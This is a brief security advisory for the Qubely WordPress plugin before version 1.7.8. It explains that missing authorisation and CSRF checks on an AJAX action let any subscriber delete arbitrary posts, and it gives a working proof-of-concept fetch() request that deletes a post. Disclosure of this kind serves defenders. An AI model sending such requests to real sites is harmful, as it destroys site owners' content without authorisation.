Qubely < 1.7.8 - Subscriber+ Arbitrary Post Deletion

The plugin does not have authorisation and CSRF check on the qubely_delete_saved_block AJAX action, and does not ensure that the block to be deleted belong to the plugin, as a result, any authenticated users, such as subscriber can delete arbitrary posts Note: v1.7.7 added capability check, CSRF check were added in 1.7.8

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=qubely_delete_saved_block&block;_id=1”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));